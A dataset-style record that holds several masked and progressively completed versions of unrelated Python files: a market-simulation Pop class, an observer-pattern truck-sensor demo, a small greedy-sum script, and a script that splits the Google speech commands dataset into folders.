self.successful_trades, 'failed_trades': self.failed_trades,
'bankrupt_times': self.bankrupt_times}
if self.pop_job is PopJob.merchant:
location_id = None
if self.trade_location:
location_id = self.trade_location.id
model.update({'location': self.location.id, 'trade_location':
location_id, 'trade_good': self.trade_good, 'trade_amount':
self.trade_amount})
return model
| import math
from historia.utils import unique_id, position_in_range
from historia.pops.models.inventory import Inventory
from historia.economy.enums.resource import Good, NaturalResource
from historia.economy.enums.order_type import OrderType
from historia.economy.models.price_range import PriceRange
from historia.economy.models.order import Order
from historia.pops.enums.pop_job import PopJob
DEBUG = False
class Pop(object):
"""
A simulated unit of population
"""
def __init__(self, province, pop_job, population):
"""
Creates a new Pop.
manager (Historia)
province (SecondaryDivision)
culture (Culture)
religion (Religion)
language (Language)
job (Job)
"""
self.bankrupt_times = 0
self.home = province
self.location = province
self.id = unique_id('po')
self.population = population
self.population_yesterday = 0
self.pop_job = pop_job
self.money = pop_job.start_money
self.money_yesterday = 0
self.bankrupt = False
self.inventory = Inventory(pop_job.inventory_size)
self.give_start_inventory()
self.update_ideal_inventory()
self.price_belief = {}
self.observed_trading_range = {}
self.successful_trades = 0
self.failed_trades = 0
for good in Good.all():
avg_price = self.market.avg_historial_price(good, 15)
self.observed_trading_range[good] = [avg_price * 0.5, avg_price *
1.5]
self.price_belief[good] = PriceRange(avg_price * 0.5, avg_price *
1.5)
self.trade_location = None
self.trade_good = None
self.trade_amount = 0
self.trading_days = 0
@property
def social_class(self):
return self.pop_job.social_class
@property
def market(self):
"""Get the market instance"""
return self.location.market
@property
def profit(self):
"""Determine today's profit"""
return self.money - self.money_yesterday
@property
def total_trades(self):
"""Total number of trades this Pop participated in"""
return self.successful_trades + self.failed_trades
@property
def trade_success(self):
"""Percent of trades that were successful"""
if self.total_trades == 0:
return 0
return self.successful_trades / self.total_trades * 100
@property
def is_away(self):
"""Is this Pop away from it's home?"""
return self.home is not self.location
def go_to_province(self, province):
"""Moves the Pop to another Province"""
self.location = province
def decide_trade_plan(self):
"""
Decide what good to trade in and how much.
Look for the most in demand good, or the most expensive good at the home Province
Find a province near home province where its the cheapest and there's inventory
"""
self.trade_amount = 5
most_demanded_goods = self.home.market.goods_demand_ratio(day_range=1)
most_demanded_goods = sorted(most_demanded_goods.items(), key=lambda
i: i[1], reverse=True)
if self.trade_good:
self.update_ideal_inventory()
if DEBUG:
print('Finding a Good to trade:')
for good, demand in most_demanded_goods:
if demand > 0:
price_at_home = self.home.market.mean_price(good)
if DEBUG:
print('Good: {}, Demand: {}, Price: ${}'.format(good.
title, demand, price_at_home))
neighboring_markets = [p.market for p in self.location.
owned_neighbors]
neighboring_markets = [m for m in neighboring_markets if m.
supply_for(good) > self.trade_amount]
neighboring_markets.sort(key=lambda m: m.supply_for(good),
reverse=True)
if len(neighboring_markets) > 0:
target = neighboring_markets[0].location
price_at_target = target.market.mean_price(good)
if price_at_home > price_at_target:
offset = 0
if good is Good.bread:
offset = 1
self.inventory.set_ideal(good, self.trade_amount +
offset)
self.trade_location = target
if DEBUG:
print(
'\tTarget: {}, Supply: {}, Price: ${}, Price at home: ${}'
.format(self.trade_location.name, self.
trade_location.market.supply_for(good),
self.trade_location.market.mean_price(good),
price_at_home))
self.trade_good = good
return
elif DEBUG:
print(
'\tPrice is higher at target (home: ${} target: ${})'
.format(price_at_home, price_at_target))
elif DEBUG:
print('\tNo markets selling {} found'.format(good))
def update_ideal_inventory(self):
"""Update ideal inventory"""
for good in Good.all():
self.inventory.set_ideal(good, 0)
for item in self.pop_job.ideal_inventory:
self.inventory.set_ideal(item['good'], item['amount'])
def give_start_inventory(self):
"""Give the Pop the inventory it needs to do its job"""
for item in self.pop_job.start_inventory:
self.inventory.add(item['good'], item['amount'])
def change_population(self, trade_success):
"""Change the population based off the trade"""
self.population_yesterday = self.population
if trade_success:
self.population += round(self.population * 0.01)
else:
self.population -= round(self.population * 0.002)
def handle_bankruptcy(self, pop_job):
"""Change job, create money out of thin air, update ideal inventory"""
self.pop_job = pop_job
self.bankrupt_times += 1
self.money = 2
self.update_ideal_inventory()
self.give_start_inventory()
def perform_logic(self):
"""Depending on PopJob, perform logic (including production)"""
logic = self.pop_job.logic(self)
logic.perform()
def create_buy_order(self, good, limit):
"""Create a buy order for a given Good at a determined quantity"""
bid_price = self.determine_price_of(good)
ideal = self.determine_buy_quantity(good)
quantity_to_buy = limit if ideal > limit else ideal
if quantity_to_buy > 0:
return Order(self, OrderType.buy_order, quantity_to_buy,
bid_price, good)
return False
def create_sell_order(self, good, limit):
"""Create a sell order for a given Good at a determined quantity"""
sell_price = self.determine_price_of(good)
ideal = self.determine_sell_quantity(good)
quantity_to_sell = limit if ideal < limit else ideal
if quantity_to_sell > 0:
return Order(self, OrderType.sell_order, quantity_to_sell,
sell_price, good)
return False
def price_belief_for(self, good):
"""Gets the price belief this agent has for a particular Good"""
if good in self.price_belief:
return self.price_belief[good]
def determine_price_of(self, good):
"""Determine the price of a particular good"""
return self.price_belief_for(good).random()
def trading_range_extremes(self, good):
"""Gets the lowest and highst price of a Good this agent has seen"""
trading_range = self.observed_trading_range[good]
return PriceRange(min(trading_range), max(trading_range))
def determine_sell_quantity(self, good):
"""Determine how much inventory goods to sell based on market conditions"""
mean = self.market.avg_historial_price(good, 15)
trading_range = self.trading_range_extremes(good)
favoribility = position_in_range(mean, trading_range.low,
trading_range.high)
amount_to_sell = round(favoribility * self.inventory.surplus(good))
if amount_to_sell < 1:
amount_to_sell = 1
return amount_to_sell
def determine_buy_quantity(self, good):
"""Determine how much goods to buy based on market conditions"""
mean = self.market.avg_historial_price(good, 15)
trading_range = self.trading_range_extremes(good)
favoribility = 1 - position_in_range(mean, trading_range.low,
trading_range.high)
amount_to_buy = round(favoribility * self.inventory.shortage(good))
if amount_to_buy < 1:
amount_to_buy = 1
return amount_to_buy
def generate_orders(self, good):
"""
If the Pop needs a Good to perform production, buy it
If the Pop has surplus Resources, sell them
"""
surplus = self.inventory.surplus(good)
if surplus >= 1:
sell_amount = surplus
order = self.create_sell_order(good, surplus)
if order:
self.market.sell(order)
else:
shortage = self.inventory.shortage(good)
free_space = self.inventory.empty_space
if shortage > 0:
if shortage <= free_space:
limit = shortage
else:
limit = math.floor(free_space / shortage)
if limit > 0:
order = self.create_buy_order(good, limit)
if order:
self.market.buy(order)
def update_price_model(self, good, order_type, is_successful,
clearing_price=0):
"""
Update the Pop's price model for the given resource
good (Good) The Good which was orderd
order_type (OrderType) Which kind of Order this was
is_successful (bool) whether or not the Order was successful
clearing_price (float) The price per unit of the good that was ordered
as defined by the Pop which ordered it
"""
SIGNIFICANT = 0.25
SIG_IMBALANCE = 0.33
LOW_INVENTORY = 0.1
HIGH_INVENTORY = 2.0
MIN_PRICE = 0.01
if is_successful:
self.observed_trading_range[good].append(clearing_price)
public_mean_price = self.market.mean_price(good)
belief = self.price_belief[good]
mean = belief.mean()
wobble = 0.05
delta_to_mean = mean - public_mean_price
if is_successful:
if (order_type is OrderType.buy_order and delta_to_mean >
SIGNIFICANT):
belief.low -= delta_to_mean / 2
belief.high -= delta_to_mean / 2
elif order_type is OrderType.sell_order and delta_to_mean < -SIGNIFICANT:
belief.low -= delta_to_mean / 2
belief.high -= delta_to_mean / 2
belief.low += wobble * mean
belief.high -= wobble * mean
else:
belief.low -= delta_to_mean / 2
belief.high -= delta_to_mean / 2
stocks = self.inventory.get_amount(good)
ideal = self.inventory.get_ideal(good)
if (order_type is OrderType.buy_order and stocks <
LOW_INVENTORY * ideal):
wobble *= 2
elif order_type is OrderType.sell_order and stocks > HIGH_INVENTORY * ideal:
wobble *= 2
else:
sells = self.market.history.sell_orders.average(good, 1)
buys = self.market.history.buy_orders.average(good, 1)
if sells + buys > 0:
supply_vs_demand = (sells - buys) / (sells + buys)
if (supply_vs_demand > SIG_IMBALANCE or
supply_vs_demand < -SIG_IMBALANCE):
new_mean = public_mean_price * (1 - supply_vs_demand)
delta_to_mean = mean - new_mean
belief.low -= delta_to_mean / 2
belief.high -= delta_to_mean / 2
belief.low -= wobble * mean
belief.high += wobble * mean
if belief.low < MIN_PRICE:
belief.low = MIN_PRICE
elif belief.high < MIN_PRICE:
belief.high = MIN_PRICE
def __repr__(self):
return '<Pop: id={} type={}>'.format(self.id, self.pop_job.title)
def __eq__(self, other):
return self.id == other.id
def __key__(self):
return self.id
def __hash__(self):
return hash(self.__key__())
def export(self):
model = {'pop_job': self.pop_job.ref(), 'population': self.
population, 'population_yesterday': self.population_yesterday,
'inventory': self.inventory.export(), 'money': self.money,
'money_yesterday': self.money_yesterday, 'successful_trades':
self.successful_trades, 'failed_trades': self.failed_trades,
'bankrupt_times': self.bankrupt_times}
if self.pop_job is PopJob.merchant:
location_id = None
if self.trade_location:
location_id = self.trade_location.id
model.update({'location': self.location.id, 'trade_location':
location_id, 'trade_good': self.trade_good, 'trade_amount':
self.trade_amount})
return model
| import math
from historia.utils import unique_id, position_in_range
from historia.pops.models.inventory import Inventory
from historia.economy.enums.resource import Good, NaturalResource
from historia.economy.enums.order_type import OrderType
from historia.economy.models.price_range import PriceRange
from historia.economy.models.order import Order
from historia.pops.enums.pop_job import PopJob
DEBUG = False
class Pop(object):
"""
A simulated unit of population
"""
def __init__(self, province, pop_job, population):
"""
Creates a new Pop.
manager (Historia)
province (SecondaryDivision)
culture (Culture)
religion (Religion)
language (Language)
job (Job)
"""
self.bankrupt_times = 0
self.home = province
self.location = province
self.id = unique_id('po')
self.population = population
self.population_yesterday = 0
self.pop_job = pop_job
# ECONOMY
self.money = pop_job.start_money
self.money_yesterday = 0
self.bankrupt = False
# set inventory and ideal amounts
self.inventory = Inventory(pop_job.inventory_size)
self.give_start_inventory()
self.update_ideal_inventory()
# a dictionary of Goods to PriceRanges
# represents the price range the agent considers valid for each Good
self.price_belief = {}
# a dictionary of Goods to price list
# represents the prices of the good that the Pop has observed
# during the time they have been trading
self.observed_trading_range = {}
self.successful_trades = 0
self.failed_trades = 0
# make some fake initial data
for good in Good.all():
avg_price = self.market.avg_historial_price(good, 15)
# fake trades
self.observed_trading_range[good] = [
avg_price * 0.5,
avg_price * 1.5
]
# generate fake price belief
self.price_belief[good] = PriceRange(avg_price * 0.5, avg_price * 1.5)
# Merchant logic
self.trade_location = None # the province this Pop is traveling to
self.trade_good = None # what good we're trading in right now
self.trade_amount = 0 # amount of trade_good we should be trading
self.trading_days = 0 # number of days waiting to trade
# Generic Pop properties
@property
def social_class(self):
return self.pop_job.social_class
@property
def market(self):
"Get the market instance"
return self.location.market
@property
def profit(self):
"Determine today's profit"
return self.money - self.money_yesterday
@property
def total_trades(self):
"Total number of trades this Pop participated in"
return self.successful_trades + self.failed_trades
@property
def trade_success(self):
"Percent of trades that were successful"
if self.total_trades == 0:
return 0
return (self.successful_trades / self.total_trades) * 100
@property
def is_away(self):
"Is this Pop away from it's home?"
return self.home is not self.location
# Merchant specific logic
def go_to_province(self, province):
"Moves the Pop to another Province"
self.location = province
def decide_trade_plan(self):
"""
Decide what good to trade in and how much.
Look for the most in demand good, or the most expensive good at the home Province
Find a province near home province where its the cheapest and there's inventory
"""
self.trade_amount = 5
most_demanded_goods = self.home.market.goods_demand_ratio(day_range=1)
most_demanded_goods = sorted(most_demanded_goods.items(), key=lambda i: i[1], reverse=True)
# if we already had a trade good, refresh ideal inventory
if self.trade_good:
self.update_ideal_inventory()
if DEBUG: print("Finding a Good to trade:")
for good, demand in most_demanded_goods:
if demand > 0:
# find nearby provinces where this has inventory and the price is lower
price_at_home = self.home.market.mean_price(good)
if DEBUG: print("Good: {}, Demand: {}, Price: ${}".format(good.title, demand, price_at_home))
neighboring_markets = [p.market for p in self.location.owned_neighbors]
neighboring_markets = [m for m in neighboring_markets if m.supply_for(good) > self.trade_amount]
neighboring_markets.sort(key=lambda m: m.supply_for(good), reverse=True)
if len(neighboring_markets) > 0:
# we found places where this good is cheaper and in inventory
target = neighboring_markets[0].location
price_at_target = target.market.mean_price(good)
# only trade with prices where we can make money
if price_at_home > price_at_target:
offset = 0
if good is Good.bread:
offset = 1
self.inventory.set_ideal(good, self.trade_amount + offset)
self.trade_location = target
if DEBUG:
print("\tTarget: {}, Supply: {}, Price: ${}, Price at home: ${}".format(
self.trade_location.name,
self.trade_location.market.supply_for(good),
self.trade_location.market.mean_price(good),
price_at_home)
)
self.trade_good = good
return
else:
if DEBUG: print("\tPrice is higher at target (home: ${} target: ${})".format(price_at_home, price_at_target))
else:
if DEBUG: print("\tNo markets selling {} found".format(good))
# Generic economic logic
def update_ideal_inventory(self):
"Update ideal inventory"
# reset so that the Pop can sell the inventory it doesn't need
for good in Good.all():
self.inventory.set_ideal(good, 0)
# update ideal inventory for new Job
for item in self.pop_job.ideal_inventory:
self.inventory.set_ideal(item['good'], item['amount'])
def give_start_inventory(self):
"Give the Pop the inventory it needs to do its job"
for item in self.pop_job.start_inventory:
self.inventory.add(item['good'], item['amount'])
def change_population(self, trade_success):
"Change the population based off the trade"
self.population_yesterday = self.population
if trade_success:
self.population += round(self.population * 0.01)
else:
self.population -= round(self.population * 0.002)
def handle_bankruptcy(self, pop_job):
"Change job, create money out of thin air, update ideal inventory"
# TODO: stop creating money out of thin air
self.pop_job = pop_job
self.bankrupt_times += 1
self.money = 2
self.update_ideal_inventory()
self.give_start_inventory()
def perform_logic(self):
"Depending on PopJob, perform logic (including production)"
logic = self.pop_job.logic(self)
logic.perform()
def create_buy_order(self, good, limit):
"Create a buy order for a given Good at a determined quantity"
bid_price = self.determine_price_of(good)
ideal = self.determine_buy_quantity(good)
# can't buy more than limit
quantity_to_buy = limit if ideal > limit else ideal
if quantity_to_buy > 0:
return Order(self, OrderType.buy_order, quantity_to_buy, bid_price, good)
return False
def create_sell_order(self, good, limit):
"Create a sell order for a given Good at a determined quantity"
sell_price = self.determine_price_of(good)
ideal = self.determine_sell_quantity(good)
# can't buy more than limit
quantity_to_sell = limit if ideal < limit else ideal
if quantity_to_sell > 0:
return Order(self, OrderType.sell_order, quantity_to_sell, sell_price, good)
return False
def price_belief_for(self, good):
"Gets the price belief this agent has for a particular Good"
if good in self.price_belief:
return self.price_belief[good]
def determine_price_of(self, good):
"Determine the price of a particular good"
return self.price_belief_for(good).random()
def trading_range_extremes(self, good):
"Gets the lowest and highst price of a Good this agent has seen"
trading_range = self.observed_trading_range[good]
return PriceRange(min(trading_range), max(trading_range))
def determine_sell_quantity(self, good):
"Determine how much inventory goods to sell based on market conditions"
mean = self.market.avg_historial_price(good, 15)
trading_range = self.trading_range_extremes(good)
favoribility = position_in_range(mean, trading_range.low, trading_range.high)
amount_to_sell = round(favoribility * self.inventory.surplus(good))
if amount_to_sell < 1:
amount_to_sell = 1
return amount_to_sell
def determine_buy_quantity(self, good):
"Determine how much goods to buy based on market conditions"
mean = self.market.avg_historial_price(good, 15)
trading_range = self.trading_range_extremes(good)
favoribility = 1 - position_in_range(mean, trading_range.low, trading_range.high)
amount_to_buy = round(favoribility * self.inventory.shortage(good))
if amount_to_buy < 1:
amount_to_buy = 1
return amount_to_buy
def generate_orders(self, good):
"""
If the Pop needs a Good to perform production, buy it
If the Pop has surplus Resources, sell them
"""
surplus = self.inventory.surplus(good)
if surplus >= 1: # sell inventory
# the original only old one item here
sell_amount = surplus
order = self.create_sell_order(good, surplus)
if order:
# print('{} sells {} {}'.format(self.pop_job.title, sell_amount, good.name))
self.market.sell(order)
else: # buy more
shortage = self.inventory.shortage(good)
free_space = self.inventory.empty_space
if shortage > 0:
if shortage <= free_space:
# enough space for ideal order
limit = shortage
else:
# not enough space for ideal order
limit = math.floor(free_space / shortage)
if limit > 0:
order = self.create_buy_order(good, limit)
if order:
# print('{} buys {} {}'.format(self.pop_job.title, limit, good.name))
self.market.buy(order)
# else:
# print("{} has no shortage of {} (has shortage: {})".format(self.pop_job.title, good.title, shortage))
def update_price_model(self, good, order_type, is_successful, clearing_price=0):
"""
Update the Pop's price model for the given resource
good (Good) The Good which was orderd
order_type (OrderType) Which kind of Order this was
is_successful (bool) whether or not the Order was successful
clearing_price (float) The price per unit of the good that was ordered
as defined by the Pop which ordered it
"""
SIGNIFICANT = 0.25 # 25% more or less is "significant"
SIG_IMBALANCE = 0.33
LOW_INVENTORY = 0.1 # 10% of ideal inventory = "LOW"
HIGH_INVENTORY = 2.0 # 200% of ideal inventory = "HIGH"
MIN_PRICE = 0.01 # lowest allowed price of a Good
if is_successful:
# add this trade to the observed trading range
self.observed_trading_range[good].append(clearing_price)
public_mean_price = self.market.mean_price(good)
belief = self.price_belief[good]
mean = belief.mean()
wobble = 0.05 # the degree which the Pop should bid outside the belief
# how different the public mean price is from the price belief
delta_to_mean = mean - public_mean_price
if is_successful:
if order_type is OrderType.buy_order and delta_to_mean > SIGNIFICANT:
# this Pop overpaid, shift belief towards mean
belief.low -= delta_to_mean / 2
belief.high -= delta_to_mean / 2
elif order_type is OrderType.sell_order and delta_to_mean < -SIGNIFICANT:
# this Pop underpaid!, shift belief towards mean
belief.low -= delta_to_mean / 2
belief.high -= delta_to_mean / 2
# increase the belief's certainty
belief.low += wobble * mean
belief.high -= wobble * mean
else:
# shift towards mean
belief.low -= delta_to_mean / 2
belief.high -= delta_to_mean / 2
# check for inventory special cases
stocks = self.inventory.get_amount(good)
ideal = self.inventory.get_ideal(good)
# if we're buying and inventory is too low
# meaning we're desperate to buy
if order_type is OrderType.buy_order and stocks < LOW_INVENTORY * ideal:
wobble *= 2
# if we're selling and inventory is too high
# meaning we're desperate to sell
elif order_type is OrderType.sell_order and stocks > HIGH_INVENTORY * ideal:
wobble *= 2
# all other cases
else:
sells = self.market.history.sell_orders.average(good, 1)
buys = self.market.history.buy_orders.average(good, 1)
# TODO: figure out why this is sometimes 0
if sells + buys > 0:
supply_vs_demand = (sells - buys) / (sells + buys)
if supply_vs_demand > SIG_IMBALANCE or supply_vs_demand < -SIG_IMBALANCE:
# too much supply? lower bid lower to sell faster
# too much demand? raise price to buy faster
new_mean = public_mean_price * (1 - supply_vs_demand)
delta_to_mean = mean - new_mean
# shift the price belief to the new price mean
belief.low -= delta_to_mean / 2
belief.high -= delta_to_mean / 2
# decrease belief's certainty since we've just changed it (we could be wrong)
belief.low -= wobble * mean
belief.high += wobble * mean
# make sure the price belief doesn't decrease below the minimum
if belief.low < MIN_PRICE:
belief.low = MIN_PRICE
elif belief.high < MIN_PRICE:
belief.high = MIN_PRICE
# Python utility methods
def __repr__(self):
return "<Pop: id={} type={}>".format(self.id, self.pop_job.title)
def __eq__(self, other):
return self.id == other.id
def __key__(self):
return self.id
def __hash__(self):
return hash(self.__key__())
def export(self):
model = {
'pop_job': self.pop_job.ref(),
'population': self.population,
'population_yesterday': self.population_yesterday,
'inventory': self.inventory.export(),
'money': self.money,
'money_yesterday': self.money_yesterday,
'successful_trades': self.successful_trades,
'failed_trades': self.failed_trades,
'bankrupt_times': self.bankrupt_times,
}
if self.pop_job is PopJob.merchant:
location_id = None
if self.trade_location:
location_id = self.trade_location.id
model.update({
'location': self.location.id,
'trade_location': location_id,
'trade_good': self.trade_good,
'trade_amount': self.trade_amount
})
return model
| [
15,
26,
28,
32,
33
] |
662 | 3b3f423cfb08413a4135646ea4d3d6dcb5d0cc10 | <mask token>
class MonitorTruck(AbstractObservable):
"""
Concrete Observable class
"""
def __init__(self, name):
super().__init__()
self.name = name
self.__physical_properties = {'temperature': 0.0, 'humidity': 0.0}
def set_value(self, measure_key, val):
if measure_key in self.__physical_properties:
self.__physical_properties[measure_key] = val
self.notify_observers()
else:
print(f'Parameter type {measure_key} not supported.')
def get_value(self, measure_key):
return self.__physical_properties.get(measure_key)
class Thermometer(AbstractObserver):
"""
Concrete Observer - Thermometer
"""
def __init__(self):
super().__init__()
def update(self, tt, obj):
if tt.__class__ == MonitorTruck:
temperature = tt.get_value('temperature')
if temperature > 37.8:
print(f'WARNING - Temperature too high: {temperature}')
elif temperature < 36.0:
print(f'WARNING - Temperature too slow: {temperature}')
else:
print(f'INFO - Temperature normal: {temperature}')
else:
pass
class HumidityMeter(AbstractObserver):
"""
Concrete Observer - humidity meter
"""
def __init__(self):
super().__init__()
def update(self, tt, obj):
if tt.__class__ == MonitorTruck:
humidity_value = tt.get_value('humidity')
if humidity_value > 60:
print(f'WARNING - humidity too high: {humidity_value}')
elif humidity_value < 40:
print(f'WARNING - humidity too high: {humidity_value}')
else:
print(f'INFO - humidity normal: {humidity_value}')
else:
pass
<mask token>
| class AbstractObservable:
<mask token>
def __init__(self):
self.__observers = []
<mask token>
def remove_observer(self, observer):
self.__observers.remove(observer)
def notify_observers(self, arg=0):
for o in self.__observers:
o.update(self, arg)
class AbstractObserver:
"""
Abstract Observer - Abstract device
"""
def __init__(self):
pass
def update(self):
pass
class MonitorTruck(AbstractObservable):
"""
Concrete Observable class
"""
def __init__(self, name):
super().__init__()
self.name = name
self.__physical_properties = {'temperature': 0.0, 'humidity': 0.0}
def set_value(self, measure_key, val):
if measure_key in self.__physical_properties:
self.__physical_properties[measure_key] = val
self.notify_observers()
else:
print(f'Parameter type {measure_key} not supported.')
def get_value(self, measure_key):
return self.__physical_properties.get(measure_key)
class Thermometer(AbstractObserver):
"""
Concrete Observer - Thermometer
"""
def __init__(self):
super().__init__()
def update(self, tt, obj):
if tt.__class__ == MonitorTruck:
temperature = tt.get_value('temperature')
if temperature > 37.8:
print(f'WARNING - Temperature too high: {temperature}')
elif temperature < 36.0:
print(f'WARNING - Temperature too slow: {temperature}')
else:
print(f'INFO - Temperature normal: {temperature}')
else:
pass
class HumidityMeter(AbstractObserver):
"""
Concrete Observer - humidity meter
"""
def __init__(self):
super().__init__()
def update(self, tt, obj):
if tt.__class__ == MonitorTruck:
humidity_value = tt.get_value('humidity')
if humidity_value > 60:
print(f'WARNING - humidity too high: {humidity_value}')
elif humidity_value < 40:
print(f'WARNING - humidity too high: {humidity_value}')
else:
print(f'INFO - humidity normal: {humidity_value}')
else:
pass
<mask token>
| class AbstractObservable:
"""
Abstract Observable
"""
def __init__(self):
self.__observers = []
def add_observer(self, observer):
self.__observers.append(observer)
def remove_observer(self, observer):
self.__observers.remove(observer)
def notify_observers(self, arg=0):
for o in self.__observers:
o.update(self, arg)
class AbstractObserver:
"""
Abstract Observer - Abstract device
"""
def __init__(self):
pass
def update(self):
pass
class MonitorTruck(AbstractObservable):
"""
Concrete Observable class
"""
def __init__(self, name):
super().__init__()
self.name = name
self.__physical_properties = {'temperature': 0.0, 'humidity': 0.0}
def set_value(self, measure_key, val):
if measure_key in self.__physical_properties:
self.__physical_properties[measure_key] = val
self.notify_observers()
else:
print(f'Parameter type {measure_key} not supported.')
def get_value(self, measure_key):
return self.__physical_properties.get(measure_key)
class Thermometer(AbstractObserver):
"""
Concrete Observer - Thermometer
"""
def __init__(self):
super().__init__()
def update(self, tt, obj):
if tt.__class__ == MonitorTruck:
temperature = tt.get_value('temperature')
if temperature > 37.8:
print(f'WARNING - Temperature too high: {temperature}')
elif temperature < 36.0:
print(f'WARNING - Temperature too slow: {temperature}')
else:
print(f'INFO - Temperature normal: {temperature}')
else:
pass
class HumidityMeter(AbstractObserver):
"""
Concrete Observer - humidity meter
"""
def __init__(self):
super().__init__()
def update(self, tt, obj):
if tt.__class__ == MonitorTruck:
humidity_value = tt.get_value('humidity')
if humidity_value > 60:
print(f'WARNING - humidity too high: {humidity_value}')
elif humidity_value < 40:
print(f'WARNING - humidity too high: {humidity_value}')
else:
print(f'INFO - humidity normal: {humidity_value}')
else:
pass
<mask token>
| class AbstractObservable:
"""
Abstract Observable
"""
def __init__(self):
self.__observers = []
def add_observer(self, observer):
self.__observers.append(observer)
def remove_observer(self, observer):
self.__observers.remove(observer)
def notify_observers(self, arg=0):
for o in self.__observers:
o.update(self, arg)
class AbstractObserver:
"""
Abstract Observer - Abstract device
"""
def __init__(self):
pass
def update(self):
pass
class MonitorTruck(AbstractObservable):
"""
Concrete Observable class
"""
def __init__(self, name):
super().__init__()
self.name = name
self.__physical_properties = {'temperature': 0.0, 'humidity': 0.0}
def set_value(self, measure_key, val):
if measure_key in self.__physical_properties:
self.__physical_properties[measure_key] = val
self.notify_observers()
else:
print(f'Parameter type {measure_key} not supported.')
def get_value(self, measure_key):
return self.__physical_properties.get(measure_key)
class Thermometer(AbstractObserver):
"""
Concrete Observer - Thermometer
"""
def __init__(self):
super().__init__()
def update(self, tt, obj):
if tt.__class__ == MonitorTruck:
temperature = tt.get_value('temperature')
if temperature > 37.8:
print(f'WARNING - Temperature too high: {temperature}')
elif temperature < 36.0:
print(f'WARNING - Temperature too slow: {temperature}')
else:
print(f'INFO - Temperature normal: {temperature}')
else:
pass
class HumidityMeter(AbstractObserver):
"""
Concrete Observer - humidity meter
"""
def __init__(self):
super().__init__()
def update(self, tt, obj):
if tt.__class__ == MonitorTruck:
humidity_value = tt.get_value('humidity')
if humidity_value > 60:
print(f'WARNING - humidity too high: {humidity_value}')
elif humidity_value < 40:
print(f'WARNING - humidity too high: {humidity_value}')
else:
print(f'INFO - humidity normal: {humidity_value}')
else:
pass
import time
if __name__ == '__main__':
tuck = MonitorTruck('John')
thermometer = Thermometer()
humidity = HumidityMeter()
for i in range(0, 15):
time.sleep(1.5)
print('====== Time step {} ======='.format(i + 1))
if i == 3:
tuck.add_observer(thermometer)
elif i == 5:
tuck.add_observer(humidity)
elif i == 10:
tuck.remove_observer(thermometer)
if i % 3 == 0:
tuck.set_value('temperature', 35.5 + 0.5 * i)
elif i % 3 == 1:
tuck.set_value('humidity', 30 + 3 * i)
| # Based on https://dev.to/jemaloqiu/design-pattern-in-python-2-observer-j4
class AbstractObservable():
"""
Abstract Observable
"""
def __init__(self):
self.__observers = []
def add_observer(self, observer):
self.__observers.append(observer)
def remove_observer(self, observer):
self.__observers.remove(observer)
def notify_observers(self, arg=0):
for o in self.__observers:
o.update(self, arg)
class AbstractObserver():
"""
Abstract Observer - Abstract device
"""
def __init__(self):
pass
def update(self):
pass
#
class MonitorTruck(AbstractObservable):
"""
Concrete Observable class
"""
def __init__(self, name):
super().__init__()
self.name = name
self.__physical_properties = {"temperature": 0.0, "humidity": 0.0}
def set_value(self, measure_key, val):
if measure_key in self.__physical_properties:
self.__physical_properties[measure_key] = val
self.notify_observers()
else:
print(f"Parameter type {measure_key} not supported.")
def get_value(self, measure_key):
return self.__physical_properties.get(measure_key)
class Thermometer(AbstractObserver):
"""
Concrete Observer - Thermometer
"""
def __init__(self):
super().__init__()
def update(self, tt, obj):
if tt.__class__ == MonitorTruck:
temperature = tt.get_value("temperature")
if temperature > 37.8:
print(f"WARNING - Temperature too high: {temperature}" )
elif temperature < 36.0:
print(f"WARNING - Temperature too slow: {temperature}")
else:
print(f"INFO - Temperature normal: {temperature}")
else:
pass
class HumidityMeter(AbstractObserver):
"""
Concrete Observer - humidity meter
"""
def __init__(self):
super().__init__()
def update(self, tt, obj):
if tt.__class__ == MonitorTruck:
humidity_value = tt.get_value("humidity")
if humidity_value > 60:
print(f"WARNING - humidity too high: {humidity_value}" )
elif humidity_value < 40:
print(f"WARNING - humidity too high: {humidity_value}" )
else:
print(f"INFO - humidity normal: {humidity_value}")
else:
pass
import time
if __name__ == "__main__":
tuck = MonitorTruck("John")
thermometer = Thermometer()
humidity = HumidityMeter()
## now kick off the simulation
for i in range(0, 15):
time.sleep(1.5)
print("====== Time step {} =======".format(i+1))
# At rount #3: thermometer is added for monitoring temperature
# At rount #5: humidity is added for monitoring the humidity level
# At rount #10: thermometer is removed
if i == 3:
tuck.add_observer(thermometer)
elif i == 5:
tuck.add_observer(humidity)
elif i == 10:
tuck.remove_observer(thermometer)
# simulating the physical parameters
if i%3 ==0:
tuck.set_value("temperature", 35.5 + 0.5*i)
elif i%3 == 1:
tuck.set_value("humidity", 30 + 3*i)
| [
13,
21,
23,
25,
26
] |
663 | 9d3439a2be1f22c8ec59923b88ac22877a4f13e8 | <mask token>
| <mask token>
m.sort(reverse=True)
<mask token>
while x > 0:
res += max(0, m[i])
m[i] -= 1
x -= 1
if m[i % n] < m[(i + 1) % n]:
i = (i + 1) % n
print(res)
| n, x = input().split()
n = int(n)
x = int(x)
m = [int(i) for i in input().split()]
m.sort(reverse=True)
i = 0
res = 0
while x > 0:
res += max(0, m[i])
m[i] -= 1
x -= 1
if m[i % n] < m[(i + 1) % n]:
i = (i + 1) % n
print(res)
| null | null | [
0,
1,
2
] |
664 | 6b2fc94d9a53b8f669cab5e1fb625dd01e20ba98 | <mask token>
| <mask token>
def move_files(src_folder, to_folder, list_file):
with open(list_file) as f:
for line in f.readlines():
line = line.rstrip()
dirname = os.path.dirname(line)
dest = os.path.join(to_folder, dirname)
if not os.path.exists(dest):
os.mkdir(dest)
shutil.move(os.path.join(src_folder, line), dest)
<mask token>
| <mask token>
def move_files(src_folder, to_folder, list_file):
with open(list_file) as f:
for line in f.readlines():
line = line.rstrip()
dirname = os.path.dirname(line)
dest = os.path.join(to_folder, dirname)
if not os.path.exists(dest):
os.mkdir(dest)
shutil.move(os.path.join(src_folder, line), dest)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description=
'Split google commands train dataset.')
parser.add_argument('root', type=str, help=
'the path to the root folder of te google commands train dataset.')
args = parser.parse_args()
audio_folder = os.path.join(args.root, 'audio')
validation_path = os.path.join(audio_folder, 'validation_list.txt')
test_path = os.path.join(audio_folder, 'testing_list.txt')
valid_folder = os.path.join(args.root, 'valid')
test_folder = os.path.join(args.root, 'test')
train_folder = os.path.join(args.root, 'train')
os.mkdir(valid_folder)
os.mkdir(test_folder)
move_files(audio_folder, test_folder, test_path)
move_files(audio_folder, valid_folder, validation_path)
os.rename(audio_folder, train_folder)
| <mask token>
import os
import shutil
import argparse
def move_files(src_folder, to_folder, list_file):
with open(list_file) as f:
for line in f.readlines():
line = line.rstrip()
